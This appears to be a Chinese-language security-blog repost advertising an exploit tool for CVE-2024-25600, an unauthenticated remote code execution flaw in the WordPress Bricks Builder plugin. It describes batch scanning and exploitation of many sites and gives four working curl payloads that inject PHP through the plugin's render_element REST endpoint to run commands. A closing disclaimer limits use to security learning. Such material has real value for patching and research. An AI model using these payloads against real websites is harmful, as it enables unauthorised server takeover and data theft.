CVE-2024-25600 漏洞利用工具
介绍
该工具旨在利用 WordPress Bricks Builder 插件中发现的 CVE-2024-25600 漏洞。该漏洞允许在受影响的网站上未经身份验证的远程代码执行。该工具通过检索随机数并发送特制请求来执行任意命令,从而自动化利用过程。
特点
-
互动模式:与目标网站实时互动🕹️。
-
批处理模式:扫描并利用列表中的多个网站📋。
-
命令执行:在目标服务器上执行任意命令⚙️。
-
有效负载定制:选择不同的有效负载进行利用,包括generic、carousel、container和code🧰。
-
RCE确认:仅显示和记录已确认RCE的URL的选项✔️。
概念验证 (PoC)
本公开提供的基础PoC如下:
第一个概念验证:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \-H "Content-Type: application/json" \-d '{ "postId": "1", "nonce": "[NONCE]", "element": { "name": "container", "settings": { "hasLoop": "true", "query": { "useQueryEditor": true, "queryEditor": "throw new Exception(`id`);", "objectType": "post" } } }}'
第二个概念验证:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \ -H "Content-Type: application/json" \ -d '{ "postId": "1", "nonce": "[NONCE]", "element": { "name": "carousel", "settings": { "type": "posts", "query": { "useQueryEditor": true, "queryEditor": "throw new Exception(`id`);", "objectType": "post" } } }}'
第三个概念验证:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \ -H "Content-Type: application/json" \ -d '{ "postId": "1", "nonce": "[NONCE]", "element": "1", "loopElement": { "settings": { "query": { "useQueryEditor": "", "queryEditor": "throw new Exception(`id`);" } } }}'
第四个概念验证(对旧版本有效):
curl -k -X POST "http://[HOST]/index.php?rest_route=/bricks/v1/render_element" \-H "Content-Type: application/json" \-d '{ "postId": "1", "nonce": "[NONCE]", "element": { "name": "code", "settings": { "executeCode": "true", "code": "<?php throw new Exception(`id`);?>" } }}'
注意:第四个 PoC 对于旧版本的 Bricks Builder(在版本 1.8 上测试)特别有效,以前的 PoC 可能不起作用。
额外的有效负载可能会产生更好的结果。如果我的漏洞利用或概念验证对您不起作用,我鼓励您尝试其他有效负载以找到更有效的解决方案。
项目地址
https://github.com/Chocapikk/CVE-2024-25600
文章来源:乌雲安全
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
END
华盟君